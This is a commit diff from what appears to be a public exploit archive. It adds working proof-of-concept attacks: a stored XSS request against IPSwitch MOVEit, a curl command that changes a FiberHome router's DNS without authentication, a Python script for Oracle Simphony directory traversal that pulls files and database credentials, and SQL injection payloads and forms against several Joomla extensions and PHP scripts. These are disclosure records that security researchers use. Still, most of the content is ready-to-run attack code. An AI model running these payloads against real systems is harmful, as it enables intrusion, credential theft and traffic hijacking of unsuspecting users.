DB: 2018-02-03

21 changes to exploits/shellcodes Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection Event Manager 1.0 - SQL Injection Fancy Clone Script - 'search_browse_product' SQL Injection Real Estate Custom Script - 'route' SQL Injection Advance Loan Management System - 'id' SQL Injection IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Joomla! Component JMS Music 1.1.1 - SQL Injection Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal FiberHome AN5506 - Unauthenticated Remote DNS Change Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes) Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
2018-02-03 05:01:48 +00:00 · 2018-02-03 05:01:48 +00:00 · d12dffd438
commit d12dffd438
parent c502d37394
23 changed files with 2612 additions and 1 deletions
--- a/exploits/aspx/webapps/43947.txt
+++ b/exploits/aspx/webapps/43947.txt
@ -0,0 +1,45 @@
+# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
+# Date: 1-31-2017
+# Software Link: https://www.ipswitch.com/moveit
+# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
+# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning Security)
+# Contact: https://twitter.com/crowdshield
+# Vendor Homepage: https://www.ipswitch.com 
+# Category: Webapps
+# Attack Type: Remote
+# Impact: Data/Cookie Theft 
+
+
+1. Description
+ 
+IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks. 
+
+
+2. Proof of Concept
+
+The vulnerability lies in the Send Message -> Body Text Area input field.
+ 
+POST /human.aspx?r=692492538 HTTP/1.1
+Host: host.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: https://host.com/human.aspx?r=510324925
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 598
+
+czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=<iframe/src=javascript:alert(1)>&attachment=&opt07=1&arg05_Send=Send
+
+
+3. Solution:
+
+Update to version 9.5
+
+
+4. Disclosure Timeline
+
+1/30/2017 - Disclosed details of vulnerability to IPSwitch.
+1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix as of version 9.5 and approved public disclosure of the vulnerability.
--- a/exploits/hardware/webapps/43961.txt
+++ b/exploits/hardware/webapps/43961.txt
@ -0,0 +1,54 @@
+#  FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability
+#
+#  Software Version RP2617
+#  Device Model AN5506-04-F
+#  Vendor Homepage: www.fiberhome.com/
+#
+#
+#  Date: 01/02/2018
+#  Exploit Author: r0ots3c
+#  http://wandoelmo.com.br
+#  https://www.facebook.com/wsec.info
+#
+#  Description:
+#  Vulnerability exists in web interface
+#  This router has vulnerabilities where you can get information or edit
+configurations in an unauthenticated way.
+#  The biggest risk is the possibility of changing the dns of the device.
+#
+#  Modifying systems' DNS settings allows cybercriminals to
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites:
+#       These sites can be phishing pages that
+#       spoof well-known sites in order to
+#       trick users into handing out sensitive
+#       information.
+#
+#    o  Replacing ads on legitimate sites:
+#       Visiting certain sites can serve users
+#       with infected systems a different set
+#       of ads from those whose systems are
+#       not infected.
+#
+#    o  Controlling and redirecting network traffic:
+#       Users of infected systems may not be granted
+#       access to download important OS and software
+#       updates from vendors like Microsoft and from
+#       their respective security vendors.
+#
+#    o  Pushing additional malware:
+#       Infected systems are more prone to other
+#       malware infections (e.g., FAKEAV infection).
+#
+#
+
+Proof of Concept:
+
+VIA CURL:
+curl 'http://<TARGET>/goform/setDhcp'  -H 'Cookie: loginName=admin' -H
+--data
+'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS
+DNS1>dhcpSecDns=<MALICIOUS
+DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
+--compressed -k -i
--- a/exploits/multiple/webapps/43960.py
+++ b/exploits/multiple/webapps/43960.py
@ -0,0 +1,197 @@
+# Exploit Title: Oracle Hospitality Simphony (MICROS) directory traversal 
+# Date: 30.01.2018
+# Exploit Author: Dmitry Chastuhin (https://twitter.com/_chipik)
+# Vendor Homepage: http://www.oracle.com/
+# Version: 2.7, 2.8 and 2.9
+# Tested on: Win, nix
+# CVE : CVE-2018-2636
+
+
+#!/usr/bin/env python
+
+# https://twitter.com/_chipik
+# Sorry for bad code practises. This is just a PoC, don't blame us very hard ¯\_(ツ)_/¯
+import requests
+import argparse
+import unicodedata
+
+
+def rm_right(str):
+    rez=""
+    k=0
+    for i in range(len(str)):
+        rez = rez + str[k:k+2]
+        k=k+4
+    return rez
+
+
+def add_right(str,char):
+    rez=""
+    k=0
+    for i in range(len(str)/2):
+        rez= rez + str[k:k+2]+char
+        k=k+2
+    return rez
+
+
+def rm_left(str):
+    rez=""
+    k=2
+    for i in range(len(str)):
+        rez = rez + str[k:k+2]
+        k=k+4
+    return rez
+
+
+def add_left(str,char):
+    rez=""
+    k=0
+    for i in range(len(str)/2):
+        rez= rez + char + str[k:k+2]
+        k=k+2
+    return rez
+
+
+def send(data,dos=0):
+    if args.verb:
+        print "[DBG] \n"+data.encode("hex")
+    if dos:
+        try:
+            r = requests.post(base_uri, headers=headers, data=data, timeout=0.001)
+        except:
+            return
+    else:
+        r = requests.post(base_uri, headers=headers, data=data)
+    if r.status_code == 200:
+        if args.verb:
+            print "[DBG] HEX:"
+            print unicodedata.normalize('NFKD', r.text).encode('ascii','ignore').encode("hex")
+            print "\n[DBG] RAW:\n"+r.text
+        print ""
+        return unicodedata.normalize('NFKD', r.text).encode('ascii','ignore')
+    else:
+        print "[DBG] status code: %d" % r.status_code
+        print "[DBG] text       : %s" % repr(r.text)
+
+
+def calculate_len(filename):
+    len2 = (len(filename)+8)/2
+    len1 = len2 + 8
+    len0 = len1 + 124
+    if args.verb:
+        print "len2="+str('{0:02x}'.format(len2))
+        print "len1="+str('{0:02x}'.format(len1))
+        print "len0="+str('{0:04x}'.format(len0))
+    return str('{0:04x}'.format(len0)),str('{0:02x}'.format(len1)),str('{0:02x}'.format(len2))
+
+
+def cli_info():
+    print "[*] Let's get info about server"
+    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
+    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
+    poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\x84\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\x58\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\xb8\x58\x00\x00\xb1\x36\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
+    poc = poc_pref+poc_body+poc_suf1
+    full_rez = send(poc)
+    return full_rez
+
+
+def cli_dbinfo():
+    print "[*] Let's get DB creds"
+    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
+    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
+    poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\xa0\x73\x71\x33\x49\x71\x35\x50\x54\x74\x66\x32\x6b\x42\x73\x53\x48\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\xbd\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\x88\x96\x00\x00\x35\x53\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x24\x00\x00\x00\x0d\x00\x44\x62\x49\x6e\x66\x6f\x52\x65\x71\x75\x65\x73\x74\x01\x00\x00\x00\x01\x00\x06\x00\x6d\x53\x70\x61\x72\x65\x08\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
+    poc = poc_pref+poc_body+poc_suf1
+    full_rez = send(poc)
+    return full_rez
+
+
+def cli_log_list():
+    print "[*] Let's get log list"
+    poc = "0c200000001000290000013872663850506e79467478667275366577687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f0000003c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c736f61703a456e76656c6f706520786d6c6e733a736f61703d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d61223e3c736f61703a426f64793e3c50726f6365737344696d655265717565737420786d6c6e733d22687474703a2f2f6d6963726f732d686f7374696e672e636f6d2f45476174657761792f22202f3e3c2f736f61703a426f64793e3c2f736f61703a456e76656c6f70653e0a100000001000180000008e72663850506e794674786672753665776170706c69636174696f6e2f6f637465742d73747265616d01e11e02000000360000003c00530049002d00530065006300750072006900740079002000560065007200730069006f006e003d0022003200220020002f003e00a5980000000000000000000001c11c0100000001d11d98a20000b13600000100000000000000000000001e00000012000000050000000a000000240024006c006f0067001dd1021cc1021ee1020000"
+    full_rez = send(poc.decode("hex"))
+    return full_rez
+
+
+def cli_read_log(filename):
+    log2="log\\"+filename
+    print "[*] Let's read %s" % log2
+    log = add_left(log2.encode("hex"),"00")
+    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
+    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
+    poc_suf_1_1='0A100000001000180000'
+    poc_suf_1_ses='66497a3263516c56444c35305045356e'
+    poc_suf_1_2='6170706C69636174696F6E2F6F637465742D73747265616D01E11E02000000360000003C00530049002D00530065006300750072006900740079002000560065007200730069006F006E003D0022003200220020002F003E00C2AF0000000000000000000001C11C0100000001D11D8EBA0000B13600000100000000000000000000001E000000'
+    poc_suf_1_len0, poc_suf_1_len1, poc_suf_1_len2 = calculate_len(log)
+    poc_suf_1_3='00000006000000'
+    poc_suf_1_4='000000240024'
+    poc_suf1=(poc_suf_1_1+poc_suf_1_len0+poc_suf_1_ses+poc_suf_1_2+poc_suf_1_len1+poc_suf_1_3+poc_suf_1_len2+poc_suf_1_4).decode("hex")
+    poc_logname = log.decode("hex")
+    if len(log2) % 2 == 1:
+        poc_suf2='001dd1021cc1021ee1020000'.decode("hex")
+    else:
+        poc_suf2='001dd1021cc1021ee102'.decode("hex")
+    poc = poc_pref+poc_body+poc_suf1+poc_logname+poc_suf2
+    full_rez = send(poc)
+    return full_rez
+
+
+def cal_tst():
+    file = "ServiceHostPrereq2012Sql\BootToDesktop.reg"
+    suf = file.encode('utf-16le')
+    print suf
+    pre = "\x0c \x00\x00\x00)\x00)\x00\x00\x04muuid:4382e7a6-607d-4392-b5df-d4b8bfcf4185\x00\x00\x00http://schemas.xmlsoap.org/soap/envelope/\x00\x00\x00"
+    xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/03/addressing\" xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\" xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"><soap:Header><wsa:Action>http://micros-hosting.com/EGateway/ProcessDimeRequest</wsa:Action><wsa:MessageID>uuid:12e52d09-38dc-4071-810d-7ced9a3bfd59</wsa:MessageID><wsa:ReplyTo><wsa:Address>http://schemas.xmlsoap.org/ws/2004/03/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsa:To>http://172.16.2.207:8080/EGateway/EGateway.asmx</wsa:To><wsse:Security><wsu:Timestamp wsu:Id=\"Timestamp-dd366974-3fbb-4e40-b868-ef9303548245\"><wsu:Created>2017-07-11T22:18:58Z</wsu:Created><wsu:Expires>2017-07-11T22:19:28Z</wsu:Expires></wsu:Timestamp></wsse:Security></soap:Header><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>"
+    suf_1 = "\x00\x00\x00\x0a\x10\x00\x00\x00)\x00\x18\x00\x00\x00\xf3uuid:d9706c6f-d103-45b2-9ca2-ec588dab1c7d\x00\x00\x00application/octet-stream\x01\xe1\x1e\x02\x00\x00\x00\x00\x00\x00\x00N\x1c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1dM\x1c\x01\x00kB\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\xad\x00\x00\x00\x01\x00\x00\x002\x00\x00\x00kB\x00\x00\x00\x00\x00\x00\x03\x01\x04\x8a\x15\x00\x00\x00\x11\x00\x00\x00\x18\x00\x00\x00W\x00o\x00r\x00k\x00s\x00t\x00a\x00t\x00i\x00o\x00n\x001\x00\\\x00\x00\x00"
+    suf_2 = "\x01\xadf\xd7\x00\x00\x00\x00\x00\x17t\x00\x00\x8e\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02\x00"
+    rez_S = suf_1+suf+suf_2
+    data =pre+xml+rez_S
+
+    print suf.decode('utf-16le')
+
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
+    parser.add_argument('-H', '--host', default='127.0.0.1', help='host')
+    parser.add_argument('-P', '--port', default='8080', help='port')
+    parser.add_argument('-i', '--info', action='store_true', help='information about micros installation')
+    parser.add_argument('-d', '--dbinfo' ,action='store_true',  help='information about micros db (usernames and hashes)')
+    parser.add_argument('-l', '--log', action='store_true', help='information about log files')
+    parser.add_argument('-s', '--ssl', action='store_true', help='enable SSL')
+    parser.add_argument('-r', '--read', help='read file from server (root dir is c:\\. Ex.: windows\\win.ini) Also u can use 1 - for SimphonyInstall.xml and 2 - for DbSettings.xml' )
+    parser.add_argument('-v', '--verb', action='store_true', default=0, help='verb')
+    args = parser.parse_args()
+    headers = dict()
+    if args.ssl:
+        base_uri = 'https://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
+    else:
+        base_uri = 'http://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
+
+    headers['SOAPAction'] = '\"http://micros-hosting.com/EGateway/ProcessDimeRequest\"'
+    headers['Content-Type']= 'application/dime'
+    headers['Expect'] = '100-continue'
+
+    if args.info:
+        results = cli_info()
+        if results.find('\x00\x55\x00\x6e\x00\x61\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x69\x00\x7a\x00\x65\x00\x64') != -1:
+            print "[*] Your instance is not vulnerable to CVE-2018-2636"
+        else:
+            print "[!] Your instance is vulnerable to CVE-2018-2636"
+        print results
+        exit()
+    if args.dbinfo:
+        print cli_dbinfo()
+        exit()
+    if args.log:
+        print cli_log_list()
+        exit()
+    if args.read:
+        if args.read == "1":
+            print cli_read_log("..\\..\\..\\SimphonyInstall.xml")
+            exit()
+        if args.read == "2":
+            print cli_read_log("..\\DbSettings.xml")
+            exit()
+        else:
+            print cli_read_log(args.read)
+            exit()
--- a/exploits/php/webapps/43940.html
+++ b/exploits/php/webapps/43940.html
@ -0,0 +1,32 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component JEXTN Membership 3.1.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://www.jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/membership-a-subscriptions/jextn-membership/
+# Version: 3.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)	
+# # # # #
+-->
+<html>
+<body>
+<form action="http://localhost/index.php?option=com_jemembership&view=myplans&task=myplans.usersubscriptions" method="post">
+<input name="usr_plan" value="(SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(1=1,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)" type="hidden">
+<input type="submit" value="Ver Ayari">
+</form>
+</body>
+</html>
--- a/exploits/php/webapps/43941.txt
+++ b/exploits/php/webapps/43941.txt
@ -0,0 +1,49 @@
+# Exploit Title: Fancy Clone Script - 'search_browse_product' SQL Injection
+# Date: 2018-01-31
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://pofitec.com/
+# Software Link: https://pofitec.com/fancy-clone-script.php
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2018-01-31
+
+Product & Service Introduction:
+===============================
+Laravel Ornate is a Multi vendor Social Ecommerce marketplace script inspired from the world famous peer to peer marketplace like Fancy and Etsy.
+
+Technical Details & Description:
+================================
+
+SQL injection on [search_browse_product] POST parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/browse_product
+
+Parameter: search_browse_product (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND 2261=2261 AND '%'='
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND EXTRACTVALUE(7589,CONCAT(0x5c,0x71717a6271,(SELECT (ELT(7589=7589,1))),0x7176767171)) AND '%'='
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' AND SLEEP(5) AND '%'='
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 26 columns
+    Payload: _token=85OAJbaUmUUlBFOL1Yf0F82wp0ROTiBwgG2syHHe&search_browse_product=alloy%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71717a6271,0x6d466b6977594d6d6c626c746e6f515674706e7a785545577768526a484455594e5a426a46484b70,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Itxn
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
--- a/exploits/php/webapps/43942.txt
+++ b/exploits/php/webapps/43942.txt
@ -0,0 +1,37 @@
+# Exploit Title: Real Estate Custom Script - 'route' SQL Injection
+# Date: 2018-01-31
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2018-01-31
+
+Product & Service Introduction:
+===============================
+Real Estate Custom Script is based on Custom PHP framework, Script was born to be ahead in innovation and at the peak of the real estate portal solutions.
+
+Technical Details & Description:
+================================
+
+SQL injection on [route] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/index.php?route=property/category
+
+Parameter: route (GET)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: route=property/category'||(SELECT 'coKq' FROM DUAL WHERE 3062=3062 AND (SELECT 7059 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(7059=7059,1))),0x7176717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&filter_propertystatus=1&filter_propertycategory=63&filter_city=any&filter_address=any&filter_country_id=223&filter_zone_id=&filter_range=1;10&
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
--- a/exploits/php/webapps/43943.txt
+++ b/exploits/php/webapps/43943.txt
@ -0,0 +1,45 @@
+# Exploit Title: Advance Loan Management System - 'id' SQL Injection
+# Date: 2018-01-31
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://codecanyon.net/
+# Software Link: https://codecanyon.net/item/advance-loan-management-system-with-savings-system-and-sms-notification/21283070
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2018-01-31
+
+Product & Service Introduction:
+===============================
+LMS – Make your Bank Loan Management easy LMS is a Modern and Responsive Loan management system.
+
+Technical Details & Description:
+================================
+
+SQL injection on [id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/view_pmt.php?id=9' AND 7768=7768 AND 'Vgmm'='Vgmm
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=9' AND 7768=7768 AND 'Vgmm'='Vgmm
+
+    Type: error-based
+    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+    Payload: id=9' AND EXTRACTVALUE(1999,CONCAT(0x5c,0x7162707071,(SELECT (ELT(1999=1999,1))),0x716b6a7171)) AND 'dJCx'='dJCx
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 9 columns
+    Payload: id=-1179' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707071,0x4c714c75756a7843774f4479627566597448726c6f51547a4d7a5766686345446b43587965626470,0x716b6a7171),NULL,NULL,NULL,NULL,NULL,NULL-- FLWW
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
--- a/exploits/php/webapps/43948.html
+++ b/exploits/php/webapps/43948.html
@ -0,0 +1,33 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component JE PayperVideo 3.0.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://www.jextn.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-paypervideo/
+# Software Download: http://www.jextn.com/index.php?option=com_docman&task=doc_download&gid=145&Itemid=276
+# Version: 3.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)	
+# # # # #
+-->
+<html>
+<body>
+<form action="http://localhost/[PATH]/index.php?option=com_jepaypervideo&view=myplans&task=myplans.usersubscriptions" method="post">
+<input name="usr_plan" value="(SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(1=1,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)" type="hidden">
+<input type="submit" value="Ver Ayari">
+</form>
+</body>
+</html>
--- a/exploits/php/webapps/43949.txt
+++ b/exploits/php/webapps/43949.txt
@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Event Manager PHP Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 01.02.2018
+# Vendor Homepage: http://ezcode.pt/
+# Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
